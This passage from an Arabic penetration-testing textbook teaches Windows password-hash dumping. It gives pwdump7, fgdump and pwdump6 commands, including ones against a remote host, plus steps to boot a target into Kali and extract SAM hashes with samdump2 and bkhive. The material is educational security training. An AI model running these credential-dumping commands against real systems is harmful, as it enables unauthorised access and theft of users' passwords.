‫ﻣﻌظم اﻟﻧظم اﻟﺗﻲ ﺗﺳﺗﺧدم آﻟﯾﺔ ﻣﺻﺎدﻗﺔ ﻛﻠﻣﺔ اﻟﻣرور ﺗﺣﺗﺎج إﻟﻰ ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ھذه )أو اﻟﮭﺎش اﻟﺧﺎﺻﺔ ﺑﮭم( ﻣﺣﻠﯾﺎ ﻋﻠﻰ اﻟﺟﮭﺎز‪.‬‬
‫وھذا ﺻﺣﯾﺢ ﺑﺎﻟﻧﺳﺑﺔ ﻷﻧظﻣﺔ اﻟﺗﺷﻐﯾل )وﯾﻧدوز‪ ،‬ﻟﯾﻧﻛس‪ ،‬وﺳﯾﺳﻛو(‪ ،‬وأﺟﮭزة اﻟﺷﺑﻛﺔ )‪ router‬و‪ ،(switch‬اﻟﺦ‪.‬‬
‫وﻏﺎﻟﺑﺎ ﻣﺎ ﯾوﺟﮫ اﻟﻣﮭﺎﺟﻣﯾن ھو اﻟﺣﺻول ﻋﻠﻰ اﻟﮭﺎش ﻣن اﻟﻣﻠف ‪ SAM‬اﻣﺎ ﻹﻋداد ﺧﺎطﻲ او اﺧﺗراق ﻧﺎﺟﺢ‪ .‬وﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان اﻟﺣﺻول‬
‫ﻋﻠﻰ اﻟﮭﺎش ﯾﻌد ﻧﺻف اﻟﻣﻌرﻛﺔ‪ .‬ﻛﻤﺎ ﻗﻠﻨﺎ ﺳﺎﺑﻘﺎ ان اﻟﻤﻠﻒ ‪ SAM‬ﯾﺘﻤﺘﻊ ﺑﺎﻟﻜﺜﯿﺮ ﻣﻦ اﻟﺤﻤﺎﯾﺔ ﻣﻦ ﻗﺒﻞ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ وﯾﻨﺪوز‪ .‬ﻟﺤﺴﻦ اﻟﺤﻆ‪ ،‬ھﻨﺎك‬
‫طﺮﯾﻘﺔ ﻟﺘﺠﺎوز ھﺬه اﻟﻘﯿﻮد ﻋﻠﻰ ﺣﺪ ﺳﻮاء‪.‬‬

‫‪Windows Hash Dumping: Pwdump and Fgdump‬‬


‫‪ Windows Hash Dumping‬ﺗﻧطوي ﻋﻠﻰ ﺗﻔرﯾﻎ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻟﺟﮭﺎز وﯾﻧدوز واﻟذي ﯾوﺟد ﻓﻲ ﻣﻠف اﻟرﺟﯾﺳﺗري‬
‫‪ NT registry‬ﺗﺣت اﻟﺑﻧد‪ HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users‬او ﺑﻣﻌﻧﻰ اﺧر ﺗﻔرﯾﻎ‬
‫اﻟﻣﻠف ‪ SAM‬ﻣن ﻣﺣﺗوﯾﺎﺗﮫ وذﻟك ﻧظرا ﻻن ھذا اﻟﻣﻠف ﻣﺣﻣﻰ ﻣن اﻟوﺻول اﻟﯾﮫ او ﺗﻌدﯾل ﻣﺣﺗوﯾﺎﺗﮫ‪ .‬ﺗﻔرﯾﻎ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻋن‬
‫طرﯾﻖ اﺳﺗﺧدام وظﯾﻔﺔ اﻟوﯾﻧدوز اﻟداﺧﻠﯾﺔ واﻟﺗﻲ ﺗدﻋو ‪ .fetch the hashes‬وﻟﻛن ﻷن ھذه اﻟوظﺎﺋف ﺗﺗطﻠب اﻣﺗﯾﺎز اﻟوﺻول اﻷﻋﻠﻰ‬
‫)‪ ،(Admin Privilege‬ﻓﻣن اﻟﺿروري اﻟﺣﺻول أوﻻ ﻋﻠﻰ اﻣﺗﯾﺎزات اﻟوﺻول اﻟﻣﻧﺎﺳﺑﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪340‬‬

‫)‪ The Local Security Authority Subsystem (LSASS‬ﯾﻌﻣل ﻣﻊ اﻣﺗﯾﺎز اﻟوﺻول اﻟﺿرورﯾﺔ ﻟﮭذا اﻟﻣﻠف‪ ،‬ﻟذﻟك ﯾﺳﺗﺧدم‬
‫‪ pwdump‬ﺗﻘﻧﯾﺔ ﺗﻌرف ﺑﺎﺳم ‪ DLL injection‬واﻟﺗﻲ ﺗﻌﻣل ﺗﺣت ﻋﻣﻠﯾﺔ ‪ LSASS‬وﺑﺎﻟﺗﺎﻟﻲ ﺗﻣﻠك اﻣﺗﯾﺎز اﻟوﺻول إﻟﻰ ﻣﻌﻠوﻣﺎت اﻟﮭﺎش‪.‬‬

‫‪ Pwdump7‬ھو ﺗطﺑﯾﻖ ﯾﻌﻣل ﻋﻠﻰ ﺗﻔرﯾﻎ ھﺎش ﻛﻠﻣﺎت اﻟﻣرور )‪ (OWFS‬ﻣن ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ Pwdump .NT’s SAM‬ﯾﻌﻣل ﻋﻠﻰ ﺗﻔرﯾﻎ‬
‫ھﺎﺷﺎت ﻛﻠﻣﺎت اﻟﻣرور )‪ (LM and NTLM‬ﻣن ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺣﻠﯾﯾن ﻣن اﻟﻣﻠف )‪ .(SAM‬ھذا اﻟﺗطﺑﯾﻖ أو اﻷداة‪ ،‬ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ‬
‫ﻋن طرﯾﻖ اﺳﺗﺧراج اﻟﻣﻠف ‪ SAM‬واﻟﻣﻠف ‪ SYSTEM‬ﻣن ﻧظﺎم اﻟﻣﻠﻔﺎت وﻣن ﺛم ﯾﺗم اﺳﺗﺧراج اﻟﮭﺎش ﻣﻧﮫ‪ .‬واﺣدة ﻣن اﻟﻣﯾزات اﻟﻘوﯾﺔ ﻣن‬
‫‪ pwdump7‬ھو أﻧﮫ ﻗﺎدر أﯾﺿﺎ ﻋﻠﻰ ﺗﻔرﯾﻎ اﻟﻣﻠﻔﺎت اﻟﻣﺣﻣﯾﺔ‪ .‬اﺳﺗﺧدام ھذا اﻟﺑرﻧﺎﻣﺞ ﯾﺗطﻠب اﻣﺗﯾﺎزات إدارﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺑﻌﯾد‪.‬‬

‫ﯾﻣﻛﻧك ﺗﺣﻣﯾل اﻹﺻدار اﻷﺧﯾر ﻣن ‪ pwdump7‬ﻣن اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬


‫‪http://www.tarasco.org/security/pwdump_7/index.html‬‬
‫ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ھذه اﻷداة ﺗﻌﻣل ﻣن ﺧﻼل ﺳطر اﻷواﻣر‪ ،‬ﻟذﻟك ﻧﻘوم ﺑﺎﻟﻧﻘر ﻋﻠﻰ اﻟزر ‪ shift‬ﻣﻊ اﻟﻧﻘر اﻷﯾﻣن ﻟﻠﻣﺎوس ﻋﻠﻰ‬ ‫‪-‬‬
‫اﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ‪ .pwdump7.exe‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور ﻗﺎﺋم ﻧﺧﺗﺎر ﻣﻧﮭﺎ ‪Open Command Windows here‬‬
‫ﻛﺎﻻﺗﻰ‪:‬‬

‫ﺑﻌد اﻟﻧﻘر ﻋﻠﯾﮫ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬ ‫‪-‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ دوﻣﯾن ‪ active directory‬ﻓﺎﻧﮫ ﯾﻘوم ﺑﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟﻣﻠف)‪.(ntds.dit‬‬
‫‪ -‬ﻧﻘوم اﻻن ﺑﺗﺷﻐﯾل اﻷداة ‪ pwdump7‬وذﻟك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ ‪ pwdump7.exe‬ﻓﻲ ﺳطر اﻷواﻣر ﺑدون أي ﺗﻌﺑﯾرات ﻣﻊ اﻟﻧﻘر‬
‫ﻓوق ‪.Enter‬‬
‫‪ -‬ھذا ﺳوف ﯾؤدى اﻟﻰ اظﮭﺎر ﺟﻣﯾﻊ اﻟﮭﺎﺷﺎت اﻟﻣﺳﺟﻠﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟوﯾﻧدوز أي ﻣن اﻟﻣﻠف ‪ SAM‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ھذه اﻷداة ﺗﺣﺗﺎج اﻟﻰ ﺻﻼﺣﯾﺎت ‪.Administrator‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪341‬‬

‫‪ -‬ﻧﻘوم ﺑﺗﺧزﯾن ھذه اﻟﮭﺎش اوى ﺑﻣﻌﻧﻰ اﺧر ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪ SAM‬ﻓﻲ ﻣﻠف اﺧر وﯾﻛون ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ > ‪pwdump7.exe‬‬
‫‪ c:\hashes.txt‬ﺛم اﻟﻧﻘر ﻋﻠﻰ ‪.Enter‬‬
‫‪ -‬ﺣﯾث ﯾﻘوم ھذا اﻻﻣر ﺑطﺑﺎﻋﺔ ﻣﺣﺗوﯾﺎﺗﮫ اﻟﻰ ﻣﻠف ﻧﺻﻲ ﻏﯾر ﻣﺣﻣﻰ ﯾﻣﻛﻧك اﻻطﻼع ﻋﻠﯾﮫ‪.‬‬
‫‪ -‬وھذا ھو وظﯾﻔﺔ ھذه اﻷداة وھو اﺳﺗﺧراج ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪.SAM‬‬
‫‪ -‬ھذه اﻷداة ﻣﺗوﻓرة أﯾﺿﺎ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﺊ‪.‬‬
‫اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻟﮭذه اﻷداة ﻛﺎﻻﺗﻰ‪:‬‬
‫)‪pwdump7.exe (Dump system passwords‬‬
‫)‪pwdump7.exe -s <samfile> <systemfile> (Dump passwords from files‬‬
‫)‪pwdump7.exe -d <filename> [destination] (Copy filename to destination‬‬
‫)‪pwdump7.exe -h (Show this help‬‬

‫‪ Fgdump‬أداه اﺧرى ﻟﺗﻔرﯾﻎ ﻛﻠﻣﺎت اﻟﻣرور ﻋﻠﻰ أﺟﮭزة وﯾﻧدوز ‪ .NT/2000/XP/2003/Vista‬ﺗﺄﺗﻲ ﻣدﻣﺟﺔ ﻣﻊ اﻟﻧظﺎم وﻟدﯾﮭﺎ ﻛل ﻗدرات‬
‫‪ Pwdump‬وﯾﻣﻛﻧﮭﺎ أﯾﺿﺎ اﻟﻘﯾﺎم ﺑﻌدد ﻣن اﻷﻣور اﻟﺣﯾوﯾﺔ اﻷﺧرى ﻣﺛل ﺗﻧﻔﯾذ اﻟﻣﻠﻔﺎت اﻟﻘﺎﺑﻠﺔ ﻟﻠﺗﻧﻔﯾذ ﻋن ﺑﻌد وﺗﻔرﯾﻎ ﻣﺣﺗوى أﻗراص اﻟﺗﺧزﯾن‬
‫اﻟﻣﺣﻣﯾﺔ ﺳواء ﻣن ﻋﻠﻰ ﺑﻌد أو ﻣﺣﻠﯾﺎ‪.‬‬

‫ھذﯾن اﻻداﺗﯾن ﯾﻣﻛﻧﮭﻣﺎ ﺗﻔرﯾﻎ اﻟﻣﻠف ‪ SAM‬ﻣن ﻋﻠﻰ اﻷﻧظﻣﺔ ﻋن ﺑﻌد أﯾﺿﺎ ﺑﺎﺳﺗﺧدام اﻟﺻﯾﻎ اﻷﺗﯾﺔ‪:‬‬
‫]‪C:\> fgdump.exe -h 192.168.0.10 -u An_Administrative_User [-p password‬‬
‫‪C:\> pwdump6.exe -u An_Administrative_User [-p password] 192.168.0.10‬‬

‫وﯾﺟب ان ﻧﺿﻊ ﻓﻲ اﻋﺗﺑﺎرﻧﺎ أن أي ﻣﺳﺗﺧدم ﻟﻛﻲ ﯾﺳﺗﺧدم ﻟﺗﻧﻔﯾذ ﺗﻔرﯾﻎ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻣن اﻟﻣﻠف ‪ SAM‬ﺳوف ﯾﺣﺗﺎج اﻟﻰ ﺗﺻرﯾﺢ اﻋﺗﻣﺎد‬
‫إدارﯾﺔ‪ .‬ﻓﻲ ھذا اﻟﺳﯾﻧﺎرﯾو‪ ،‬ﺳﯾطﻠب ﻣﻧك إدﺧﺎل ﻛﻠﻣﺔ اﻟﺳر ﻗﺑل ﺑدء ﺗﻔرﯾﻎ ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫اﻻﻣر‪ Fgdump‬ﺳوف ﯾﻘوم ﺑﺗﺧزﯾن اﻟﮭﺎش ﻓﻲ اﻟﻣﻠف ]‪[*.fgdump‬؛ أﻣﺎ ‪ pwdump7‬ﺳوف ﯾﻔرغ ﻣﺣﺗوﯾﺎت ‪ SAM‬إﻟﻰ اﻟﺷﺎﺷﺔ‪ .‬وﻟﻛن‬
‫ﻣﺎذا ﺗﻔﻌل إذا ﻛﺎن ﻟﯾس ﻟدﯾك وﺻول ﻣﺑﺎﺷر ﻟﻠﻧظﺎم اﻟﮭدف‪ ،‬أو ﻻ ﺗﻣﻠك ﺻﻼﺣﯾﺎت ﻣدﯾر اﻟﻧظﺎم ﻟﺗﻧﻔﯾذ ھذا اﻻﻣر ﺣﯾث ان اﻟﮭدف ﻣن اﺳﺗﺧداﻣﮫ‬
‫ھﻲ اﻟوﺻول اﻟﻰ ﺻﻼﺣﯾﺎت ﻣدﯾر اﻟﻧظﺎم‪.‬‬

‫)‪Extracting the Hashes from the SAM (Locally‬‬

‫ﻟﺣﺳن اﻟﺣظ‪ ،‬ھﻧﺎك طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﻘﯾود ﻋﻠﻰ ﺣد ﺳواء‪ .‬ﻷﻧﻧﺎ ﻧﻧﺎﻗش اﻟﮭﺟﻣﺎت اﻟﻣﺣﻠﯾﺔ وﻷن ﻟدﯾﻧﺎ اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ اﻟﻧظﺎم‪ ،‬وأﺑﺳط‬
‫طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﺣﻣﺎﯾﺔ ھو اﻟﺗﻣﮭﯾد ﻟﻧظﺎم ﺗﺷﻐﯾل ﺑدﯾل ﻣﺛل ﻛﺎﻟﻲ‪ .‬ﺑواﺳطﺔ ﺗﻣﮭﯾد ھدﻓﻧﺎ ﻟﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل‪ ،‬ﻓﻧﺣن ﻗﺎدرون ﻋﻠﻰ ﺗﺟﺎوز‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪342‬‬

‫ﺗﺄﻣﯾن ‪ .Windows SAM‬ھذا ﻣﻣﻛن ﻷن ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻻ ﯾﺑدأ‪ ،‬اﻟﻘﻔل ﻟن ﯾﻌﻣل أﺑدا‪ ،‬وﻧﺣن أﺣرار ﻓﻲ اﻟوﺻول إﻟﻰ اﻟﻣﻠف ‪.SAM‬‬
‫وﻟﻛن ﻟﻸﺳف‪ ،‬ﻻ ﯾزال ﺗﺷﻔﯾر اﻟﻣﻠف ‪ ،SAM‬ﻟذﻟك ﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﺳﺗﺧدام أداة ﻟﻠوﺻول إﻟﻰ اﻟﮭﺎش‪ .‬ﻟﺣﺳن اﻟﺣظ‪ ،‬ھذه اﻷداة اﻟﻣطﻠوﺑﺔ‬
‫ﻣدﻣﺟﺔ ﻓﻲ اﻟﻧظﺎم ﻛﺎﻟﻲ‪.‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ ﻹﻗﻼع )‪(boot‬اﻟﮭدف ﺑﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل‪ .‬أﺳﮭل اﻟطرق ﻋﺎدة ﻣﺎ ﺗﻧطوي ﻋﻠﻰ ﺗﺣﻣﯾل‬
‫اﻻﺻدار " ‪ ."Live CD\DVD‬ﺛم ﯾﺗم ﻧﺳﺧﮭﺎ إﻟﻰ أﺳطواﻧﺔ اﻗراص‪ ،‬واﻟﺗﻲ ﯾﻣﻛن إدراﺟﮭﺎ ﻓﻲ ﻣﺣرك اﻷﻗراص اﻟﺿوﺋﯾﺔ ﻣن اﻟﺟﮭﺎز‬
‫اﻟﮭدف‪ .‬ﺣﯾث أن اﻟﻌدﯾد ﻣن أﻧظﻣﺔ ﻣﺣرﻛﺎت اﻷﻗراص ﺳوف ﺗﺗﺣﻘﻖ ﻣن وﺟد أي أﻗراص ﺿوﺋﯾﺔ ﺑﮭﺎ ﺛم ﺗﻠﻘﺎﺋﯾﺎ ﺗﻘوم ﺑﺗﺷﻐﯾﻠﮭﺎ‪ .‬إذا ﻟم ﯾﻛن‬
‫اﻟﻧظﺎم اﻟﮭدف اﻟﺧﺎص ﺑك ﯾﻘوم ﺑﺗﺷﻐﯾل اﻷﻗراص اﻟﺿوﺋﯾﺔ ﺗﻠﻘﺎﺋﯾﺎ‪ ،‬ﻓﯾﻣﻛﻧك اﺳﺗﺧدام ﺗرﻛﯾﺑﺔ ﻣن اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ ﺣﺳب ﻧوع ‪ BIOS‬اﻟﻣﺳﺗﺧدم‬
‫)‪ (F9 in HP Lap‬ﻟﺗﻐﯾﯾر ﺗرﺗﯾب اﻟﺗﻣﮭﯾد أو اﻟدﺧول اﻟﻰ إﻋدادات ‪ BIOS‬ﻟﺟﻌل اﻹﻗﻼع ﺑﯾدا ﻣن ﺧﻼل ﻣن ﻣﺣرك اﻷﻗراص اﻟﺿوﺋﯾﺔ‪.‬‬
‫ﻓﻲ ﺣﺎل ﻟم ﯾﻛن ﻟدﯾك ﻓﻲ اﻟﻧظﺎم اﻟذي ﺗﺳﺗﮭدﻓﮫ ﻣﺣرك أﻗراص ﺿوﺋﯾﺔ‪ ،‬ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام ‪ UNetbootin‬ﻹﻧﺷﺎء ﻣﺣرك أﻗراص‬
‫‪ USB‬ﻟﻠﺗﻣﮭﯾد‪ UNetbootin .‬ﯾﺳﻣﺢ ﻟك ﻟﺟﻌل إﺻدارات ﻟﯾﻧﻛس ﻛﺎﻟﻲ "‪ "live‬و اﻟﻌدﯾد ﻣن اﻟﺗوزﯾﻌﺎت اﻷﺧرى‪ .‬اﻟﺟﻣﻊ ﺑﯾن‬
‫‪ UNetbootin‬ﻣﻊ ﻛﺎﻟﻲ ‪ ISO‬ﯾﺳﻣﺢ ﻟك ﺑﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل ﺑﺄﻛﻣﻠﮫ ﻣن ﻣﺣرك ‪ ،USB‬ﻣﻣﺎ ﯾﺧﻠﻖ ﻣﺟﻣوﻋﺔ أدوات ﻗوﯾﺔ ﺟدا‪،‬‬
‫وﻣﺣﻣوﻟﺔ‪ .‬ﻛﻣﺎ ھو اﻟﺣﺎل ﻣﻊ ‪ ،live CD / DVD‬ﻗد ﺗﺣﺗﺎج ﻟﺗﻐﯾﯾر ﺗرﺗﯾب اﻟﺗﻣﮭﯾد ﻟﻧظﺎم اﻟﺿﺣﯾﺔ ﻗﺑل اﺳﺗﮭداﻓﮭﺎ‪.‬‬

‫‪ -‬ﺑﻌد ﺗﻣﮭﯾد اﻟﻧظﺎم اﻟﮭدف إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل‪ ،‬ﻓﺈن أول ﺷﻲء ﻋﻠﯾك اﻟﻘﯾﺎم ﺑﮫ ھو ﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟﺛﺎﺑت اﻟﻣﺣﻠﻲ‪ .‬ﺗﺄﻛد‬
‫ﻣن ﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻣﺟﻠد ‪ .Windows‬ﯾﻣﻛﻧﻧﺎ ﺗﺣﻘﯾﻖ ذﻟك ﻣن ﺧﻼل ﻓﺗﺢ اﻟﺗرﻣﻧﺎل وﻛﺗﺎﺑﺔ اﻻﺗﻲ‪:‬‬
‫‪#mount©-t©ntfs-3g©-o©rw©/dev/sda1©/mnt/sda1‬‬
‫ﻣن اﻟﻣﮭم أن ﺗﻘوم ﺑﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟﺻﺣﯾﺢ وﻟﯾس ﻛل اﻷﻧظﻣﺔ اﻟﻣﺳﺗﮭدﻓﺔ ﺳﯾﻛون ﻟﮭﺎ ‪ ./dev/sda1‬إذا ﻛﻧت ﻏﯾر ﻣﺗﺄﻛد أي ﻣن‬
‫اﻟﻣﺣرﻛﺎت اﻟﺗﻲ ﺗﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز واﻟﺗﻲ ﺗﺣﺗﺎج اﻟﻰ ﺗﺣﻣﯾﻠﮭﺎ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل‪ ،‬ﻓﯾﻣﻛﻧك ﺗﺷﻐﯾل اﻷﻣر "‪ "fdisk -l‬ﻣن ﺧﻼل‬
‫اﻟﺗرﻣﻧﺎل‪ .‬ﺳﺗﻘوم اﻷداة ‪ fdisk‬ﺑﺳرد ﻛﺎﻓﺔ ﻣﺣرﻛﺎت اﻷﻗراص اﻟﻣﺗوﻓرة ﻋﻠﻰ اﻟﻧظﺎم اﻟﺗﻲ ﺗﺳﺗﮭدﻓﮭﺎ‪ ،‬وﯾﻧﺑﻐﻲ أن ﺗﺳﺎﻋدك ﻓﻲ ﺗﺣدﯾد ﻣﺣرك‬
‫اﻷﻗراص اﻟذي ﺗﺣﺗﺎج إﻟﻰ ﺗﺣﻣﯾﻠﮫ)‪ .(mount‬ﻗد ﺗﺣﺗﺎج أﯾﺿﺎ إﻟﻰ إﻧﺷﺎء ﻧﻘطﺔ اﻟﺗﺣﻣﯾل )‪ (mount point‬ﻓﻲ اﻟﻣﺟﻠد ‪ /mnt‬ﺣﯾث ﺳوف ﯾﻛون‬
‫اﻟﺑواﺑﺔ اﻟﻰ اﻟﻣﺣرك اﻟذي ﯾﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‪.‬‬
‫‪ -‬ﻟﻠﻘﯾﺎم ﺑذﻟك‪ ،‬ﯾﻣﻛﻧك ﺑﺑﺳﺎطﺔ اﺳﺗﺧدام اﻷﻣر "‪:"mkdir‬‬
‫‪#mkdir©/mnt/sda1‬‬

‫ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﺗرﻛﯾب ﻣﺣرك اﻷﻗراص اﻟﻣﺣﻠﻲ ﺑﻧﺟﺎح ﻓﻲ ﻛﺎﻟﻲ‪ ،‬ﻓﺳوف ﺗﻛون ﻗﺎدرا ﻋﻠﻰ ﺗﺻﻔﺢ اﻟﻣﺣرك اﻟذي ﯾﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل‬
‫وﯾﻧدوز "\‪ ."C:‬ﯾﺟب أن ﺗﻛون اﻵن ﻗﺎدرا ﻋﻠﻰ اﻟﺗﻧﻘل إﻟﻰ ﻣﻠف ‪.SAM‬‬
‫‪ -‬ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑذﻟك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻷﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل‪:‬‬
‫‪#cd©/mnt/sda1/Windows/system32/config‬‬

‫إذا ﻧﻔذ ﻛل ﺷﻲء ﻛﻣﺎ ھو ﻣﺧطط ﻟﮫ‪ ،‬ﯾﺟب أن ﺗﻛون ﻓﻲ اﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف ‪ .SAM‬ﻟﻌرض ﻣﺣﺗوﯾﺎت اﻟﻣﺟﻠد اﻟﺣﺎﻟﻲ ﻧﺳﺗﺧدم اﻻﻣر‬
‫‪ ls‬ﻓﻲ إطﺎر اﻟﺗرﻣﻧﺎل‪ ،‬ﯾﺟب أن ﺗﺷﺎھد ﻣﻠف ‪ .SAM‬ﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻟﻘطﺔ ﻟﻌرض ﻛل اﻟﺧطوات اﻟﻣطﻠوﺑﺔ ﻟﺗﺣدﯾد ﻣوﻗﻊ اﻟﻣﻠف ‪.SAM‬‬

‫‪1‬‬

‫‪2‬‬

‫‪3‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪343‬‬

‫‪4‬‬

‫‪5‬‬

‫‪6‬‬

‫اﻵن ﺑﻌد أن ﻗﻣﻧﺎ ﺑﺈﯾﺟﺎد اﻟﻣﻠف ‪ ،SAM‬ﯾﻣﻛﻧﻧﺎ اﺳﺗﺧدام أداة ﺗﺳﻣﻰ ‪ Samdump2‬ﻻﺳﺗﺧراج اﻟﮭﺎش‪ .‬ﻋﻧد ھذه اﻟﻧﻘطﺔ ﻟدﯾﻧﺎ اﻟﻘدرة ﻋﻠﻰ رؤﯾﺔ‬
‫وﻧﺳﺦ اﻟﻣﻠف ‪ ،SAM‬ﻓﻲ اﻟواﻗﻊ اﻟﺗﻐﻠب ﻋﻠﻰ ﻣﯾزة اﻷﻣن أوﻻ‪ ،‬وﻟﻛن ﻻ ﯾزال ﺗﺷﻔﯾر اﻟﻣﻠف ‪ .SAM‬ﻣن أﺟل ﻋرض ﻧﺳﺧﺔ ﻏﯾر ﻣﺷﻔرة ﻣن‬
‫اﻟﻣﻠف ‪ ،SAM‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﺗﺷﻐﯾل ‪ Samdump2. Samdump2‬ﯾﺳﺗﺧدم ﻣﻠف ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺣﻠﻲ ﯾﺳﻣﻰ "‪ "system‬ﻟﻔك ﺗﺷﻔﯾر اﻟﻣﻠف‬
‫‪ .SAM‬ﻟﺣﺳن اﻟﺣظ‪ ،‬اﻟﻣﻠف "‪ "system‬ﯾﻘﻊ ﻓﻲ ﻧﻔس اﻟﻣﺟﻠد اﻟذي ﯾﻘﻊ ﻓﯾﮫ اﻟﻣﻠف ‪.SAM‬‬
‫ﻟﺗﺷﻐﯾل ‪ ،Samdump2‬ﻓﻧﻛﺗب اﻷﻣر "‪ "samdump2‬ﻣﺗﺑوﻋﺎ ﺑﺎﺳم وﻣوﻗﻊ اﻟﻣﻠف "‪ ،”system‬ﯾﻠﯾﮫ اﺳم وﻣوﻗﻊ اﻟﻣﻠف ‪ SAM‬اﻟذي ﻧرﯾد‬
‫ﻋرض ﻣﺣﺗوﯾﺎﺗﮫ‪.‬‬
‫‪ -‬ﻋﻧد ھذه اﻟﻧﻘطﺔ‪ ،‬ﻓﻧﺣن ﯾﻣﻛن اﺳﺗﺧراج ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪ SAM‬ﻋن طرﯾﻖ ﺗﺷﻐﯾل اﻷﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل‪:‬‬
‫‪#samdump2©system©SAM©>©/tmp/hash.txt‬‬

‫ﺣﯾث ان اﻻﻣر ‪ samdump2‬ﺳوف ﯾﻘوم ﺑﻧﺳﺦ ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪ SAM‬اﻟﻰ اﻟﻣﻠف ‪ /tmp/hash.txt‬اﻟﻐﯾر ﻣﺣﻣﻰ‪.‬‬
‫ﻣﻠﺣوظﮫ‪ :‬اﻟوﺻول إﻟﻰ اﻟﮭﺎش ﻓﻲ ﺑﻌض أﻧظﻣﺔ اﻟوﯾﻧدوز ﻗد ﺗﺗطﻠب ﺧطوة إﺿﺎﻓﯾﺔ‪ Bkhive .‬ھو اﻷداة اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺎﺳﺗﺧراج‬
‫)‪ (Syskey bootkey‬ﻣن اﻟﻣﻠف ‪ .system‬ﻗد ﯾﻛون ﻣن اﻟﺿروري اﺳﺗﺧدام ‪ bkhive‬ﻻﺳﺗﺧراج ﻣﻔﺗﺎح اﻟﻧظﺎم ﻣن أﺟل اﻟﻛﺷف اﻟﺗﺎم‬
‫ﻋن ھﺎﺷﺎت ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
